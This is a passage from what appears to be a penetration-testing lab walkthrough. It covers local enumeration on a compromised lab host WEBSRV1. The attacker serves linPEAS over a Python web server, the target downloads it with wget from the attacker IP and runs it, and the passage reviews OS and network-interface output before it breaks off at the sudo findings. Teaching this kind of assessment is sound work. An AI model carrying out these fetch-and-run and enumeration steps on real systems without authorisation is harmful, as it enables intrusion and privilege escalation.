In the previous section, we gained access to the target machine WEBSRV1. In this section, we'll perform local enumeration to identify attack vectors and sensitive information and attempt to elevate our privileges.
Because we often have time constraints in a penetration test, such as the duration of an assessment, let's use the linPEAS automated Linux enumeration script to obtain a broad variety of information and identify any potential low hanging fruit.
To do this, let's copy linpeas.sh to the websrv1 directory and start a Python3 web server to serve it.
kali@kali:~/beyond/websrv1$cp /usr/share/peass/linpeas/linpeas.sh .
kali@kali:~/beyond/websrv1$python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (<http://0.0.0.0:80/>) ...
In our SSH session, we can use wget to download the enumeration script. In addition, we'll use chmod to make the script executable.
daniela@websrv1:~$wget <http://192.168.119.5/linpeas.sh>
daniela@websrv1:~$chmod a+x ./linpeas.sh
Now, we can run the script and start the enumeration.
daniela@websrv1:~$./linpeas.sh
Once the enumeration script has finished, let's review some of the results.
We'll begin with the system information.
╔══════════╣ Operative system
╚ <https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits>
Linux version 5.15.0-48-generic (buildd@lcy02-amd64-080) (gcc (Ubuntu 11.2.0-19ubuntu1) 11.2.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #54-Ubuntu SMP Fri Aug 26 13:26:29 UTC 2022
Distributor ID: Ubuntu
Description:Ubuntu 22.04.1 LTS
Release: 22.04
Codename: jammy
Listing confirms that the machine is running Ubuntu 22.04 as we've identified via the OpenSSH service version.
Next, we'll review the network interfaces.
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:8a:26:5d brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.50.244/24 brd 192.168.50.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe8a:265d/64 scope link
valid_lft forever preferred_lft forever
Listing shows only one network interface apart from the loopback interface. This means that the target machine is not connected to the internal network and we cannot use it as a pivot point.
Since we have already enumerated MAILSRV1 without any actionable results and this machine is not connected to the internal network, we have to discover sensitive information, such as credentials, to get a foothold in the internal network. To obtain files and data from other users and the system, we'll make elevating our privileges our priority.
The following result section from linPEAS contains an interesting piece of information regarding commands executable with sudo.